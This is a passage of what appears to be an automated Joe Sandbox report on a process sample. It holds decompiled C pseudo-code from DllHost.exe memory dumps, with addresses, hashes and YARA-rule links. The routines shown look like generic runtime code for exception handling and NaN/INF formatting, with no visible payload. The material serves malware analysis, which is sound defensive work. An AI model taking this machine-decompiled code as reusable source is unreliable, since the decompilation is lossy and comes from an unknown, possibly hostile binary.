				if ( *((intOrPtr*)(_t117 + 0x18)) + 1 - 0x1000 < 0) goto 0x191b3587;
				if ( *_t117 -  *((intOrPtr*)(_t165 - 8)) - 8 - 0x1f > 0) goto 0x191b3707;
				0x191d23d0();
				 *((long long*)(_t117 + 0x18)) = 0xf;
				asm("inc ecx");
				asm("movdqa xmm0, xmm1");
				asm("psrldq xmm0, 0x8");
				asm("dec cx");
				asm("dec ax");
				E00007FF77FF7191BAB00(_t117, _t117, _t172, _t172 + 1, _t193);
				r8d = 3;
				E00007FF77FF7191BAB00(_t117, _t117, _t172, _t172 + 1, _t191);
				_t151 =  >=  ?  *((void*)(_t175 + 7)) : _t175 + 7;
				E00007FF77FF7191BAB00(_t117, _t117, _t172,  *((intOrPtr*)(_t175 + 0x17)), _t189);
				if ( *((long long*)(_t175 - 9)) == 0) goto 0x191b3618;
				E00007FF77FF7191BAB00(_t117, _t117, _t172, _t191, _t162);
				_t154 =  >=  ?  *((void*)(_t175 - 0x19)) : _t175 - 0x19;
				E00007FF77FF7191BAB00(_t117, _t117, _t172,  *((intOrPtr*)(_t175 - 9)), _t174);
				_t135 =  *((intOrPtr*)(_t117 + 0x10));
				_t155 =  *((intOrPtr*)(_t117 + 0x18));
				if (_t135 - _t155 >= 0) goto 0x191b3641;
				 *((long long*)(_t117 + 0x10)) = _t135 + 1;
				if (_t155 - 0x10 < 0) goto 0x191b3639;
				 *((short*)( *_t117 + _t135)) = 0x22;
				goto 0x191b3654;
				r9b = 0x22;
				r8d = 0;
				_t70 = E00007FF77FF7191BC910(_t117, _t155,  *((intOrPtr*)(_t165 - 8)), _t189, _t191);
				_t156 =  *((intOrPtr*)(_t175 - 1));
				if (_t156 - 0x10 < 0) goto 0x191b368f;
				if (_t156 + 1 - 0x1000 < 0) goto 0x191b368a;
				if ( *((intOrPtr*)(_t175 - 0x19)) -  *((intOrPtr*)( *((intOrPtr*)(_t175 - 0x19)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191b370d;
				0x191d23d0();
				 *((long long*)(_t175 - 9)) = _t189;
				 *((long long*)(_t175 - 1)) = 0xf;
				 *((char*)(_t175 - 0x19)) = 0;
				_t159 =  *((intOrPtr*)(_t175 + 0x1f));
				if (_t159 - 0x10 < 0) goto 0x191b36d6;
				if (_t159 + 1 - 0x1000 < 0) goto 0x191b36d1;
				if ( *((intOrPtr*)(_t175 + 7)) -  *((intOrPtr*)( *((intOrPtr*)(_t175 + 7)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191b3701;
				0x191d23d0();
				return E00007FF77FF7191D23B0(_t70,  ==  ? r14d : 8,  *(_t175 + 0x27) ^ _t177 - 0x00000090);
			}

































                                                                                                                                                              0x7ff7191b3430
                                                                                                                                                              0x7ff7191b3435
                                                                                                                                                              0x7ff7191b3442
                                                                                                                                                              0x7ff7191b344e
                                                                                                                                                              0x7ff7191b3458
                                                                                                                                                              0x7ff7191b345c
                                                                                                                                                              0x7ff7191b3462
                                                                                                                                                              0x7ff7191b3465
                                                                                                                                                              0x7ff7191b3468
                                                                                                                                                              0x7ff7191b346c
                                                                                                                                                              0x7ff7191b346f
                                                                                                                                                              0x7ff7191b3473
                                                                                                                                                              0x7ff7191b3476
                                                                                                                                                              0x7ff7191b347a
                                                                                                                                                              0x7ff7191b3482
                                                                                                                                                              0x7ff7191b3485
                                                                                                                                                              0x7ff7191b3491
                                                                                                                                                              0x7ff7191b349d
                                                                                                                                                              0x7ff7191b349f
                                                                                                                                                              0x7ff7191b34a2
                                                                                                                                                              0x7ff7191b34a6
                                                                                                                                                              0x7ff7191b34aa
                                                                                                                                                              0x7ff7191b34ae
                                                                                                                                                              0x7ff7191b34be
                                                                                                                                                              0x7ff7191b34cd
                                                                                                                                                              0x7ff7191b34d2
                                                                                                                                                              0x7ff7191b34d6
                                                                                                                                                              0x7ff7191b34da
                                                                                                                                                              0x7ff7191b34de
                                                                                                                                                              0x7ff7191b34ea
                                                                                                                                                              0x7ff7191b34ee
                                                                                                                                                              0x7ff7191b34f9
                                                                                                                                                              0x7ff7191b3506
                                                                                                                                                              0x7ff7191b3511
                                                                                                                                                              0x7ff7191b3515
                                                                                                                                                              0x7ff7191b351c
                                                                                                                                                              0x7ff7191b351e
                                                                                                                                                              0x7ff7191b3522
                                                                                                                                                              0x7ff7191b3525
                                                                                                                                                              0x7ff7191b3527
                                                                                                                                                              0x7ff7191b352f
                                                                                                                                                              0x7ff7191b3532
                                                                                                                                                              0x7ff7191b3537
                                                                                                                                                              0x7ff7191b353b
                                                                                                                                                              0x7ff7191b3541
                                                                                                                                                              0x7ff7191b3547
                                                                                                                                                              0x7ff7191b3549
                                                                                                                                                              0x7ff7191b3556
                                                                                                                                                              0x7ff7191b3569
                                                                                                                                                              0x7ff7191b357e
                                                                                                                                                              0x7ff7191b358a
                                                                                                                                                              0x7ff7191b358f
                                                                                                                                                              0x7ff7191b3597
                                                                                                                                                              0x7ff7191b359b
                                                                                                                                                              0x7ff7191b359f
                                                                                                                                                              0x7ff7191b35a4
                                                                                                                                                              0x7ff7191b35a9
                                                                                                                                                              0x7ff7191b35b1
                                                                                                                                                              0x7ff7191b35b6
                                                                                                                                                              0x7ff7191b35c6
                                                                                                                                                              0x7ff7191b35d4
                                                                                                                                                              0x7ff7191b35e0
                                                                                                                                                              0x7ff7191b35ea
                                                                                                                                                              0x7ff7191b35f9
                                                                                                                                                              0x7ff7191b3607
                                                                                                                                                              0x7ff7191b3613
                                                                                                                                                              0x7ff7191b3618
                                                                                                                                                              0x7ff7191b361c
                                                                                                                                                              0x7ff7191b3623
                                                                                                                                                              0x7ff7191b3629
                                                                                                                                                              0x7ff7191b3634
                                                                                                                                                              0x7ff7191b3639
                                                                                                                                                              0x7ff7191b363f
                                                                                                                                                              0x7ff7191b3641
                                                                                                                                                              0x7ff7191b3644
                                                                                                                                                              0x7ff7191b364e
                                                                                                                                                              0x7ff7191b3654
                                                                                                                                                              0x7ff7191b365c
                                                                                                                                                              0x7ff7191b366f
                                                                                                                                                              0x7ff7191b3684
                                                                                                                                                              0x7ff7191b368a
                                                                                                                                                              0x7ff7191b368f
                                                                                                                                                              0x7ff7191b3693
                                                                                                                                                              0x7ff7191b369b
                                                                                                                                                              0x7ff7191b369f
                                                                                                                                                              0x7ff7191b36a7
                                                                                                                                                              0x7ff7191b36ba
                                                                                                                                                              0x7ff7191b36cf
                                                                                                                                                              0x7ff7191b36d1
                                                                                                                                                              0x7ff7191b3700

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo_noreturn$ApisFile__std_exception_destroy__std_fs_code_page
                                                                                                                                                              • String ID: ", "$: "
                                                                                                                                                              • API String ID: 2261858363-747220369
                                                                                                                                                              • Opcode ID: 62b77d51fee1077e1d9d1d561448f628a596399e79bd4237f8f93679b3b41e96
                                                                                                                                                              • Instruction ID: 727570ee51ed4f7c156b8ee4a26b628689881ff767957df093be2f646d82f573
                                                                                                                                                              • Opcode Fuzzy Hash: 62b77d51fee1077e1d9d1d561448f628a596399e79bd4237f8f93679b3b41e96
                                                                                                                                                              • Instruction Fuzzy Hash: 57E1AD62B05A8185FB04EF29E0583ACA372EB44BACF804531DE5E07B99DF78D5DAD350
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191E98C4 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 104COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00007FF77FF7191E98C4(void* __edx, char* __r8, void* __r9) {
				void* _t7;
				signed long long _t11;
				signed long long _t12;
				void* _t17;

				_t16 = _t17 - 0x4f;
				_t18 = _t17 - 0xc0;
				_t11 =  *0x192190a0; // 0x590452ce5669
				_t12 = _t11 ^ _t17 - 0x000000c0;
				 *(_t17 - 0x4f + 0x3f) = _t12;
				if (__r9 - _t12 + 4 >= 0) goto 0x191e9910;
				 *__r8 = 0;
				return E00007FF77FF7191D23B0(0xc, _t7,  *(_t16 + 0x3f) ^ _t18);
			}







                                                                                                                                                              0x7ff7191e98c6
                                                                                                                                                              0x7ff7191e98cb
                                                                                                                                                              0x7ff7191e98d2
                                                                                                                                                              0x7ff7191e98d9
                                                                                                                                                              0x7ff7191e98dc
                                                                                                                                                              0x7ff7191e98f0
                                                                                                                                                              0x7ff7191e98f2
                                                                                                                                                              0x7ff7191e990f

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                              • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                                                                                              • API String ID: 3215553584-2617248754
                                                                                                                                                              • Opcode ID: dbd02d232e830c6fc1ca1ba8c65caa0aae648e0df9e61b4777ebb11afa26fc27
                                                                                                                                                              • Instruction ID: 0b1faebcd27e3f3b96c657f15bac88f4530440b56f54d193e5bcfa40df8fb2f3
                                                                                                                                                              • Opcode Fuzzy Hash: dbd02d232e830c6fc1ca1ba8c65caa0aae648e0df9e61b4777ebb11afa26fc27
                                                                                                                                                              • Instruction Fuzzy Hash: 88418C32B09F458AF701DF25E8507AD73B9EB183A8F844536DA5C13B94DE38D56AC390
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191D59BC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 313COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 65%
                                                                                                                                                              			E00007FF77FF7191D59BC(intOrPtr __ecx, void* __edx, intOrPtr* __rcx, long long __rdx, long long __r8, long long __r9, void* __r10) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				signed int* _t127;
				void* _t144;
				intOrPtr _t145;
				intOrPtr _t153;
				void* _t172;
				intOrPtr _t175;
				signed int _t176;
				signed int _t177;
				void* _t179;
				void* _t208;
				signed long long _t218;
				signed long long _t219;
				signed long long _t225;
				long long _t227;
				signed int _t234;
				intOrPtr* _t235;
				intOrPtr* _t236;
				signed long long _t245;
				long long _t266;
				signed int* _t279;
				long long _t280;
				void* _t281;
				void* _t282;
				signed long long _t283;
				long long _t295;
				signed int _t304;

				_t281 = _t282 - 0x28;
				_t283 = _t282 - 0x128;
				_t218 =  *0x192190a0; // 0x590452ce5669
				_t219 = _t218 ^ _t283;
				 *(_t281 + 0x10) = _t219;
				_t279 =  *((intOrPtr*)(_t281 + 0x90));
				_t304 =  *((intOrPtr*)(_t281 + 0xa8));
				 *((long long*)(_t283 + 0x68)) = __r8;
				_t235 = __rcx;
				 *((long long*)(_t281 - 0x80)) = __rdx;
				 *(_t281 - 0x68) = _t304;
				 *((char*)(_t283 + 0x60)) = 0;
				_t280 = __r9;
				_t127 = E00007FF77FF7191D7C78(__ecx, __rcx, __rdx, __r9, __r9, _t281, _t279, __r9);
				r14d = _t127;
				if (_t127 - 0xffffffff < 0) goto 0x191d5e7b;
				if (_t127 - _t279[1] >= 0) goto 0x191d5e7b;
				if ( *_t235 != 0xe06d7363) goto 0x191d5b07;
				if ( *((intOrPtr*)(_t235 + 0x18)) != 4) goto 0x191d5b07;
				if ( *((intOrPtr*)(_t235 + 0x20)) - 0x19930520 - 2 > 0) goto 0x191d5b07;
				if ( *((long long*)(_t235 + 0x30)) != 0) goto 0x191d5b07;
				E00007FF77FF7191D4EF8(_t219);
				if ( *((long long*)(_t219 + 0x20)) == 0) goto 0x191d5e14;
				E00007FF77FF7191D4EF8(_t219);
				_t236 =  *((intOrPtr*)(_t219 + 0x20));
				E00007FF77FF7191D4EF8(_t219);
				 *((char*)(_t283 + 0x60)) = 1;
				 *((long long*)(_t283 + 0x68)) =  *((intOrPtr*)(_t219 + 0x28));
				E00007FF77FF7191D3E28(_t219,  *((intOrPtr*)(_t236 + 0x38)));
				if ( *_t236 != 0xe06d7363) goto 0x191d5abf;
				if ( *((intOrPtr*)(_t236 + 0x18)) != 4) goto 0x191d5abf;
				if ( *((intOrPtr*)(_t236 + 0x20)) - 0x19930520 - 2 > 0) goto 0x191d5abf;
				if ( *((long long*)(_t236 + 0x30)) == 0) goto 0x191d5e7b;
				E00007FF77FF7191D4EF8(_t219);
				if ( *(_t219 + 0x38) == 0) goto 0x191d5b07;
				E00007FF77FF7191D4EF8(_t219);
				E00007FF77FF7191D4EF8(_t219);
				 *(_t219 + 0x38) =  *(_t219 + 0x38) & 0x00000000;
				if (E00007FF77FF7191D7D10(_t219, _t236, _t236,  *(_t219 + 0x38), __r9) != 0) goto 0x191d5b02;
				if (E00007FF77FF7191D7E00(_t219, _t236,  *(_t219 + 0x38), __r9, _t281) == 0) goto 0x191d5e58;
				goto 0x191d5e34;
				 *((long long*)(_t281 - 0x40)) =  *((intOrPtr*)(__r9 + 8));
				 *(_t281 - 0x48) = _t279;
				if ( *_t236 != 0xe06d7363) goto 0x191d5dcb;
				if ( *((intOrPtr*)(_t236 + 0x18)) != 4) goto 0x191d5dcb;
				if ( *((intOrPtr*)(_t236 + 0x20)) - 0x19930520 - 2 > 0) goto 0x191d5dcb;
				r13d = 0;
				if (_t279[3] - r13d <= 0) goto 0x191d5cfc;
				 *(_t283 + 0x28) =  *(_t281 + 0xa0);
				 *(_t283 + 0x20) = _t279;
				r8d = r14d;
				_t144 = E00007FF77FF7191D36CC(_t236, _t281 - 0x28, _t281 - 0x48, __r9, _t281, __r9, __r10);
				asm("movups xmm0, [ebp-0x28]");
				asm("movdqu [ebp-0x38], xmm0");
				asm("psrldq xmm0, 0x8");
				asm("movd eax, xmm0");
				if (_t144 -  *((intOrPtr*)(_t281 - 0x10)) >= 0) goto 0x191d5cfc;
				_t295 =  *((intOrPtr*)(_t281 - 0x28));
				r12d =  *((intOrPtr*)(_t281 - 0x30));
				 *((long long*)(_t283 + 0x78)) = _t295;
				_t145 = r12d;
				asm("inc ecx");
				 *((intOrPtr*)(_t281 - 0x50)) = __ecx;
				asm("movd eax, xmm0");
				asm("movups [ebp-0x60], xmm0");
				if (_t145 - r14d > 0) goto 0x191d5ceb;
				_t225 =  *(_t281 - 0x60) >> 0x20;
				if (r14d - _t145 > 0) goto 0x191d5ceb;
				_t266 =  *((intOrPtr*)( *((intOrPtr*)( *( *(_t281 - 0x38)) + 0x10)) + ( *( *(_t281 - 0x38)) +  *( *(_t281 - 0x38)) * 4) * 4 +  *((intOrPtr*)(_t295 + 8)) + 0x10)) +  *((intOrPtr*)(__r9 + 8));
				 *((long long*)(_t281 - 0x70)) = _t266;
				if (r15d == 0) goto 0x191d5ce8;
				_t245 = _t225 + _t225 * 4;
				asm("movups xmm0, [edx+ecx*4]");
				asm("movups [ebp-0x8], xmm0");
				_t59 = _t245 * 4; // 0x48ccccc35f40c483
				 *((intOrPtr*)(_t281 + 8)) =  *((intOrPtr*)(_t266 + _t59 + 0x10));
				E00007FF77FF7191D3DFC(_t225);
				_t227 = _t225 + 4 +  *((intOrPtr*)( *((intOrPtr*)(_t236 + 0x30)) + 0xc));
				 *((long long*)(_t283 + 0x70)) = _t227;
				E00007FF77FF7191D3DFC(_t227);
				_t175 =  *((intOrPtr*)(_t227 +  *((intOrPtr*)( *((intOrPtr*)(_t236 + 0x30)) + 0xc))));
				 *((intOrPtr*)(_t283 + 0x64)) = _t175;
				if (_t175 <= 0) goto 0x191d5c79;
				E00007FF77FF7191D3DFC(_t227);
				 *((long long*)(_t281 - 0x78)) = _t227 +  *((intOrPtr*)( *((intOrPtr*)(_t283 + 0x70))));
				if (E00007FF77FF7191D6888(_t179, _t236, _t281 - 8, _t227 +  *((intOrPtr*)( *((intOrPtr*)(_t283 + 0x70)))), _t279, __r9,  *((intOrPtr*)(_t236 + 0x30))) != 0) goto 0x191d5c8a;
				 *((long long*)(_t283 + 0x70)) =  *((long long*)(_t283 + 0x70)) + 4;
				_t153 =  *((intOrPtr*)(_t283 + 0x64)) - 1;
				 *((intOrPtr*)(_t283 + 0x64)) = _t153;
				if (_t153 > 0) goto 0x191d5c3d;
				r13d = r13d + 1;
				if (r13d == r15d) goto 0x191d5ce3;
				goto 0x191d5bf6;
				 *((char*)(_t283 + 0x58)) =  *((intOrPtr*)(_t281 + 0x98));
				 *(_t283 + 0x50) =  *((intOrPtr*)(_t283 + 0x60));
				 *((long long*)(_t283 + 0x48)) =  *(_t281 - 0x68);
				 *(_t283 + 0x40) =  *(_t281 + 0xa0);
				 *(_t283 + 0x38) = _t281 - 0x60;
				 *(_t283 + 0x30) =  *((intOrPtr*)(_t281 - 0x78));
				 *(_t283 + 0x28) = _t281 - 8;
				 *(_t283 + 0x20) = _t279;
				E00007FF77FF7191D5814(_t175, _t236, _t236,  *((intOrPtr*)(_t281 - 0x80)),  *((intOrPtr*)(_t283 + 0x68)), _t280);
				r13d = 0;
				r12d = r12d + 1;
				if (r12d -  *((intOrPtr*)(_t281 - 0x10)) < 0) goto 0x191d5b91;
				if (( *_t279 & 0x1fffffff) - 0x19930521 < 0) goto 0x191d5e08;
				_t208 = _t279[8] - r13d;
				if (_t208 == 0) goto 0x191d5d22;
				E00007FF77FF7191D3DE8(_t281 - 8);
				if (_t208 != 0) goto 0x191d5d43;
				if ((_t279[9] >> 0x00000002 & 0x00000001) == 0) goto 0x191d5e08;
				if (E00007FF77FF7191D3510(_t279[9] >> 0x00000002 & 0x00000001, _t281 - 8 + _t279[8], _t280, _t279) != 0) goto 0x191d5e08;
				if ((_t279[9] >> 0x00000002 & 0x00000001) != 0) goto 0x191d5e5e;
				if (_t279[8] == r13d) goto 0x191d5d68;
				E00007FF77FF7191D3DE8(_t281 - 8 + _t279[8]);
				_t234 = _t279[8];
				goto 0x191d5d6b;
				if (E00007FF77FF7191D7D10(_t234, _t236, _t236, _t304, _t280) != 0) goto 0x191d5e08;
				E00007FF77FF7191D35DC(_t236,  *((intOrPtr*)(_t281 - 0x80)), _t280, _t281, _t279, _t281 - 0x78);
				_t176 =  *((intOrPtr*)(_t281 + 0x98));
				 *(_t283 + 0x50) = _t176;
				_t177 = _t176 | 0xffffffff;
				 *((long long*)(_t283 + 0x48)) = _t280;
				 *(_t283 + 0x40) = _t304;
				 *(_t283 + 0x38) = _t177;
				 *(_t283 + 0x30) = _t177;
				 *(_t283 + 0x28) = _t279;
				 *(_t283 + 0x20) = _t304;
				E00007FF77FF7191D3974( *((intOrPtr*)(_t281 - 0x80)), _t236,  *((intOrPtr*)(_t283 + 0x68)), _t234);
				goto 0x191d5e08;
				if (_t279[3] <= 0) goto 0x191d5e08;
				if ( *((char*)(_t281 + 0x98)) != 0) goto 0x191d5e7b;
				 *(_t283 + 0x38) = _t304;
				 *(_t283 + 0x30) =  *(_t281 + 0xa0);
				 *(_t283 + 0x28) = r14d;
				 *(_t283 + 0x20) = _t279;
				E00007FF77FF7191D6380(_t236, _t236,  *((intOrPtr*)(_t281 - 0x80)),  *(_t281 - 0x58) >> 0x20, _t280);
				_t172 = E00007FF77FF7191D4EF8(_t234);
				if ( *((long long*)(_t234 + 0x38)) != 0) goto 0x191d5e7b;
				return E00007FF77FF7191D23B0(_t172, _t177,  *(_t281 + 0x10) ^ _t283);
			}

































                                                                                                                                                              0x7ff7191d59c9
                                                                                                                                                              0x7ff7191d59ce
                                                                                                                                                              0x7ff7191d59d5
                                                                                                                                                              0x7ff7191d59dc
                                                                                                                                                              0x7ff7191d59df
                                                                                                                                                              0x7ff7191d59e3
                                                                                                                                                              0x7ff7191d59ed
                                                                                                                                                              0x7ff7191d59f7
                                                                                                                                                              0x7ff7191d59fc
                                                                                                                                                              0x7ff7191d59ff
                                                                                                                                                              0x7ff7191d5a09
                                                                                                                                                              0x7ff7191d5a10
                                                                                                                                                              0x7ff7191d5a15
                                                                                                                                                              0x7ff7191d5a18
                                                                                                                                                              0x7ff7191d5a1d
                                                                                                                                                              0x7ff7191d5a23
                                                                                                                                                              0x7ff7191d5a2c
                                                                                                                                                              0x7ff7191d5a38
                                                                                                                                                              0x7ff7191d5a42
                                                                                                                                                              0x7ff7191d5a53
                                                                                                                                                              0x7ff7191d5a5e
                                                                                                                                                              0x7ff7191d5a64
                                                                                                                                                              0x7ff7191d5a6e
                                                                                                                                                              0x7ff7191d5a74
                                                                                                                                                              0x7ff7191d5a79
                                                                                                                                                              0x7ff7191d5a7d
                                                                                                                                                              0x7ff7191d5a86
                                                                                                                                                              0x7ff7191d5a8f
                                                                                                                                                              0x7ff7191d5a94
                                                                                                                                                              0x7ff7191d5a9f
                                                                                                                                                              0x7ff7191d5aa5
                                                                                                                                                              0x7ff7191d5ab2
                                                                                                                                                              0x7ff7191d5ab9
                                                                                                                                                              0x7ff7191d5abf
                                                                                                                                                              0x7ff7191d5ac9
                                                                                                                                                              0x7ff7191d5acb
                                                                                                                                                              0x7ff7191d5ad4
                                                                                                                                                              0x7ff7191d5adf
                                                                                                                                                              0x7ff7191d5aeb
                                                                                                                                                              0x7ff7191d5af7
                                                                                                                                                              0x7ff7191d5afd
                                                                                                                                                              0x7ff7191d5b0b
                                                                                                                                                              0x7ff7191d5b0f
                                                                                                                                                              0x7ff7191d5b19
                                                                                                                                                              0x7ff7191d5b23
                                                                                                                                                              0x7ff7191d5b34
                                                                                                                                                              0x7ff7191d5b3a
                                                                                                                                                              0x7ff7191d5b41
                                                                                                                                                              0x7ff7191d5b51
                                                                                                                                                              0x7ff7191d5b5c
                                                                                                                                                              0x7ff7191d5b61
                                                                                                                                                              0x7ff7191d5b64
                                                                                                                                                              0x7ff7191d5b69
                                                                                                                                                              0x7ff7191d5b6d
                                                                                                                                                              0x7ff7191d5b72
                                                                                                                                                              0x7ff7191d5b77
                                                                                                                                                              0x7ff7191d5b7e
                                                                                                                                                              0x7ff7191d5b84
                                                                                                                                                              0x7ff7191d5b88
                                                                                                                                                              0x7ff7191d5b8c
                                                                                                                                                              0x7ff7191d5b9c
                                                                                                                                                              0x7ff7191d5bab
                                                                                                                                                              0x7ff7191d5bb5
                                                                                                                                                              0x7ff7191d5bb8
                                                                                                                                                              0x7ff7191d5bbc
                                                                                                                                                              0x7ff7191d5bc3
                                                                                                                                                              0x7ff7191d5bcd
                                                                                                                                                              0x7ff7191d5bd4
                                                                                                                                                              0x7ff7191d5be1
                                                                                                                                                              0x7ff7191d5be9
                                                                                                                                                              0x7ff7191d5bf0
                                                                                                                                                              0x7ff7191d5bf9
                                                                                                                                                              0x7ff7191d5bfd
                                                                                                                                                              0x7ff7191d5c01
                                                                                                                                                              0x7ff7191d5c05
                                                                                                                                                              0x7ff7191d5c09
                                                                                                                                                              0x7ff7191d5c0c
                                                                                                                                                              0x7ff7191d5c1d
                                                                                                                                                              0x7ff7191d5c20
                                                                                                                                                              0x7ff7191d5c25
                                                                                                                                                              0x7ff7191d5c32
                                                                                                                                                              0x7ff7191d5c35
                                                                                                                                                              0x7ff7191d5c3b
                                                                                                                                                              0x7ff7191d5c3d
                                                                                                                                                              0x7ff7191d5c58
                                                                                                                                                              0x7ff7191d5c63
                                                                                                                                                              0x7ff7191d5c69
                                                                                                                                                              0x7ff7191d5c6f
                                                                                                                                                              0x7ff7191d5c71
                                                                                                                                                              0x7ff7191d5c77
                                                                                                                                                              0x7ff7191d5c79
                                                                                                                                                              0x7ff7191d5c7f
                                                                                                                                                              0x7ff7191d5c85
                                                                                                                                                              0x7ff7191d5c9f
                                                                                                                                                              0x7ff7191d5ca7
                                                                                                                                                              0x7ff7191d5caf
                                                                                                                                                              0x7ff7191d5cba
                                                                                                                                                              0x7ff7191d5cc2
                                                                                                                                                              0x7ff7191d5ccb
                                                                                                                                                              0x7ff7191d5cd4
                                                                                                                                                              0x7ff7191d5cd9
                                                                                                                                                              0x7ff7191d5cde
                                                                                                                                                              0x7ff7191d5ce8
                                                                                                                                                              0x7ff7191d5ceb
                                                                                                                                                              0x7ff7191d5cf2
                                                                                                                                                              0x7ff7191d5d08
                                                                                                                                                              0x7ff7191d5d0e
                                                                                                                                                              0x7ff7191d5d12
                                                                                                                                                              0x7ff7191d5d14
                                                                                                                                                              0x7ff7191d5d20
                                                                                                                                                              0x7ff7191d5d2a
                                                                                                                                                              0x7ff7191d5d3d
                                                                                                                                                              0x7ff7191d5d4b
                                                                                                                                                              0x7ff7191d5d55
                                                                                                                                                              0x7ff7191d5d57
                                                                                                                                                              0x7ff7191d5d5f
                                                                                                                                                              0x7ff7191d5d66
                                                                                                                                                              0x7ff7191d5d75
                                                                                                                                                              0x7ff7191d5d88
                                                                                                                                                              0x7ff7191d5d8d
                                                                                                                                                              0x7ff7191d5d9e
                                                                                                                                                              0x7ff7191d5da2
                                                                                                                                                              0x7ff7191d5da5
                                                                                                                                                              0x7ff7191d5daa
                                                                                                                                                              0x7ff7191d5daf
                                                                                                                                                              0x7ff7191d5db3
                                                                                                                                                              0x7ff7191d5dba
                                                                                                                                                              0x7ff7191d5dbf
                                                                                                                                                              0x7ff7191d5dc4
                                                                                                                                                              0x7ff7191d5dc9
                                                                                                                                                              0x7ff7191d5dcf
                                                                                                                                                              0x7ff7191d5dd8
                                                                                                                                                              0x7ff7191d5de7
                                                                                                                                                              0x7ff7191d5def
                                                                                                                                                              0x7ff7191d5df6
                                                                                                                                                              0x7ff7191d5dfe
                                                                                                                                                              0x7ff7191d5e03
                                                                                                                                                              0x7ff7191d5e08
                                                                                                                                                              0x7ff7191d5e12
                                                                                                                                                              0x7ff7191d5e33

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Frame$BlockEstablisherHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                                              • API String ID: 3606184308-393685449
                                                                                                                                                              • Opcode ID: f9367e6c75bb173107a314b3c95ae3313fe471dc0540157b0f0e4e32114bbf85
                                                                                                                                                              • Instruction ID: 6fbc20d7b142cb25ef2cc8b1dcb1bdd30f458f2ae23c6ec7aa41f2bb57a1bddf
                                                                                                                                                              • Opcode Fuzzy Hash: f9367e6c75bb173107a314b3c95ae3313fe471dc0540157b0f0e4e32114bbf85
                                                                                                                                                              • Instruction Fuzzy Hash: 40D16032A08B418AFB20AF65A4442ADB7F4FB457ACF800135DE4D57B99DF38E49AD710
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191B2420 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 139COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 57%
                                                                                                                                                              			E00007FF77FF7191B2420(long long __rax, long long __rbx, long long* __rcx, void* __rdx, long long __rsi) {
				void* _t56;
				intOrPtr _t81;
				void* _t96;
				long long _t97;
				long long* _t100;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t108;
				void* _t109;
				long long _t111;

				_t72 = __rax;
				 *((long long*)(_t105 + 0x10)) = __rbx;
				 *((long long*)(_t105 + 0x18)) = __rsi;
				_t103 = _t105 - 0x47;
				_t100 = __rcx;
				if (__rcx == 0) goto 0x191b25aa;
